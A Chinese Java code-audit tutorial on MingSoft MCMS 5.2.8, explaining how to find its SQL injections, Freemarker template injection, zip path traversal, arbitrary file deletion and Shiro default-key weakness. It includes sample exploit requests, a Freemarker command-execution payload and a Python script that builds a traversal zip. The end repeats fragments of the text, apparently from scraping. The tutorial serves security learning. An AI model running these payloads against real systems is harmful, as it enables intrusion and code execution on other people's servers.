铭飞CMS Java代码审计实战指南<\/h1>

前言<\/h2>
铭飞CMS是一个基于Mybatis+Spring组合的企业级内容管理系统，其漏洞类型丰富，非常适合新手进行Java代码审计的学习和实践。本文将从审计流程入手，详细讲解如何一步步发现系统中的各类漏洞。<\/p>

环境搭建<\/h2>

源码获取<\/h3>
源码地址：https:\/\/gitee.com\/mingSoft\/MCMS\/releases\/tag\/5.2.8<\/p>

部署方式<\/h3>

IDEA Spring Boot启动<\/strong>：<\/p>

直接使用IDEA导入项目并运行<\/li> <\/ul> <\/li>

War包部署<\/strong>：<\/p>

取消pom.xml中的war注释<\/li>
执行mvn clean package<\/code><\/li>
将生成的war包放入Tomcat的webapps目录<\/li> <\/ul> <\/li> <\/ol> 数据库配置<\/h3> 配置文件路径：src\main\resources\application-dev.yml<\/code><\/p> 创建数据库mcms<\/li> 导入数据<\/li> 修改配置中的数据库账户密码<\/li> <\/ul> 审计思路<\/h2> 初步分析<\/h3> 查看项目文档(md文件)了解技术架构<\/li> 若无文档，则：检查依赖库(lib)是否存在已知漏洞<\/li> 使用静态扫描工具(如OpenSCA)扫描高危依赖<\/li> <\/ul> <\/li> <\/ol> 代码结构分析<\/h3> 关注Maven依赖中的官方库<\/li> 下载完整代码以便方法跟踪<\/li> <\/ol> 漏洞挖掘与分析<\/h2> SQL注入漏洞<\/h3> 审计方法<\/h4> 全局搜索$<\/code>符号(Mybatis未预编译的标识)<\/li> 分析参数是否可控<\/li> 检查过滤机制是否可绕过<\/li> <\/ol> 漏洞点1：orderBy参数注入<\/h4> 文件：net\/mingsoft\/base\/dao\/IBaseDao.xml<\/code><\/li> 关键代码：$orderBy<\/code><\/li> 调用链： IBaseDao.xml → BaseBizImpl.java → 具体接口实现 <\/code><\/pre> <\/li> 过滤机制：仅过滤空格，可使用内联注释绕过<\/li> 利用数据包： POST<\/span> \/ms\/mdiy\/formData\/queryData HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 10.28.194.30:8080<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 25<\/span> <\/span><\/span> <\/span><\/span>modelId=1&orderBy=1 <\/span><\/span><\/code><\/pre><\/li> 利用工具：sqlmap配合tamper脚本<\/li> <\/ul> 漏洞点2：fieldName参数注入<\/h4> 文件：net\/mingsoft\/base\/biz\/impl\/BaseBizImpl.java<\/code><\/li> 关键代码：$key<\/code>(fieldName)<\/li> 调用接口：\/ms\/mdiy\/page\/verify.do<\/code><\/li> 无过滤机制<\/li> 利用数据包： GET<\/span> \/ms\/mdiy\/page\/verify.do?fieldName=1'&fieldValue=1 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 10.28.194.30:8080<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 其他SQL注入点分析<\/h4> updataBySQL<\/code>接口：fields参数固定，LINK_ID被过滤<\/li> countBySQL<\/code>接口：无实际调用<\/li> queryExcludeApp<\/code>接口：存在$orderBy<\/code>但被过滤<\/li> <\/ul> Freemarker模板注入<\/h3> 发现过程<\/h4> 静态扫描发现Freemarker低版本漏洞<\/li> 后台找到模板管理功能<\/li> 尝试写入Freemarker payload<\/li> <\/ol> 利用payload<\/h4> <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("open -a Calculator") } <\/code><\/pre> 代码分析<\/h4> 接口：generateIndex.do<\/code><\/li> 调用链： generateIndex.do → generate() → rendering() → process() <\/code><\/pre> <\/li> 无命令执行过滤<\/li> <\/ul> 文件写入漏洞<\/h3> 发现过程<\/h4> 抓取模板写入接口：writeFileContent.do<\/code><\/li> 分析文件后缀限制<\/li> <\/ol> 限制分析<\/h4> 禁止上传：exe、jsp、jspx<\/li> 配置文件路径：检查全局过滤配置<\/li> Windows绕过：使用::$DATA<\/code>特性<\/li> <\/ul> 文件上传+路径穿越<\/h3> 发现过程<\/h4> 后台模板管理上传zip功能<\/li> 分析上传处理流程<\/li> <\/ol> 漏洞点<\/h4> 上传接口：uploadTemplate.do<\/code>做了路径遍历过滤<\/li> 解压接口：unZip.do<\/code>未检查zip内部文件路径<\/li> 可构造包含..\/..\/xxx.jsp<\/code>的zip文件实现目录穿越<\/li> <\/ul> 恶意zip生成代码<\/h4> import<\/span> zipfile <\/span><\/span> <\/span><\/span>zip_archive =<\/span> zipfile.<\/span>ZipFile('archive.zip'<\/span>, 'w'<\/span>, zipfile.<\/span>ZIP_DEFLATED) <\/span><\/span>source_file =<\/span> 'xxx.jsp'<\/span> <\/span><\/span>target_path_in_zip =<\/span> '..\/..\/xxx.jsp'<\/span> <\/span><\/span> <\/span><\/span>with<\/span> open(source_file, 'rb'<\/span>) as<\/span> source_file_handler: <\/span><\/span> file_content =<\/span> source_file_handler.<\/span>read() <\/span><\/span>zip_archive.<\/span>writestr(target_path_in_zip, file_content) <\/span><\/span>zip_archive.<\/span>close() <\/span><\/span><\/code><\/pre>任意文件删除<\/h3> 发现过程<\/h4> 后台删除栏目时带路径参数<\/li> 全局搜索delete<\/code>方法<\/li> <\/ol> 漏洞点<\/h4> 方法：deleteCategoryHtml<\/code><\/li> 无路径和文件名过滤<\/li> 可遍历删除任意文件<\/li> <\/ul> Shiro反序列化漏洞<\/h3> 基本情况<\/h4> 使用Shiro 1.8.0<\/li> 存在默认密钥问题<\/li> 密钥位置：applicant.yml<\/code><\/li> <\/ul> 利用方法<\/h4> 直接使用Shiro利用工具进行攻击<\/p> 总结<\/h2> 审计要点<\/h3> SQL注入<\/strong>：<\/p> 重点搜索$<\/code>符号<\/li> 分析参数可控性<\/li> 检查过滤机制<\/li> <\/ul> <\/li> 模板注入<\/strong>：<\/p> 检查模板引擎版本<\/li> 寻找模板编辑和渲染接口<\/li> <\/ul> <\/li> 文件操作漏洞<\/strong>：<\/p> 检查上传、解压、删除等操作<\/li> 注意路径处理逻辑<\/li> <\/ul> <\/li> 框架漏洞<\/strong>：<\/p> 检查Shiro、Freemarker等组件版本<\/li> 测试默认密钥<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h3> 对所有用户输入进行严格过滤<\/li> 使用预编译SQL语句<\/li> 限制文件操作的范围和权限<\/li> 及时更新框架组件<\/li> 修改默认配置和密钥<\/li> <\/ol> 通过本案例的学习，可以掌握企业级Java系统的审计方法和常见漏洞挖掘技巧。<\/p>

铭飞CMS Java代码审计实战指南<\/h1>

前言<\/h2> 铭飞CMS是一个基于Mybatis+Spring组合的企业级内容管理系统，其漏洞类型丰富，非常适合新手进行Java代码审计的学习和实践。本文将从审计流程入手，详细讲解如何一步步发现系统中的各类漏洞。<\/p>

环境搭建<\/h2>

源码获取<\/h3> 源码地址：https:\/\/gitee.com\/mingSoft\/MCMS\/releases\/tag\/5.2.8<\/p>

审计思路<\/h2>

漏洞挖掘与分析<\/h2>

SQL注入漏洞<\/h3>

Freemarker模板注入<\/h3>

文件写入漏洞<\/h3>

文件上传+路径穿越<\/h3>

任意文件删除<\/h3>

Shiro反序列化漏洞<\/h3>

利用方法<\/h4> 直接使用Shiro利用工具进行攻击<\/p>

总结<\/h2>

前言<\/h2>
铭飞CMS是一个基于Mybatis+Spring组合的企业级内容管理系统，其漏洞类型丰富，非常适合新手进行Java代码审计的学习和实践。本文将从审计流程入手，详细讲解如何一步步发现系统中的各类漏洞。<\/p>

源码获取<\/h3>
源码地址：https:\/\/gitee.com\/mingSoft\/MCMS\/releases\/tag\/5.2.8<\/p>

利用方法<\/h4>
直接使用Shiro利用工具进行攻击<\/p>